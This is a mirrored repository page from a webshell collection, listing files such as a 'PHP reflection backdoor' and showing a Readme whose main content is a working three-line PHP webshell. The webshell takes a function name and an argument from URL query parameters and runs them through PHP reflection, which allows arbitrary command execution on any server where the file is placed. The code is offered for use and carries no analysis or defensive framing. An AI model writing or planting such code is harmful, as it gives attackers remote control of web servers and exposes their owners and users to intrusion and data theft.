mirror of
https://github.com/tennc/webshell
synced 2025-02-18 02:38:24 +00:00
.. | ||
11.jpg | ||
PHP reflection.php.txt | ||
PHP反射后门.php.txt | ||
Readme.md |
![Title alt text](/Mirrors/webshell/media/commit/4317fa72b89c1922dbe661f83e29ddce83b617e1/php/p2j/11.jpg)
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>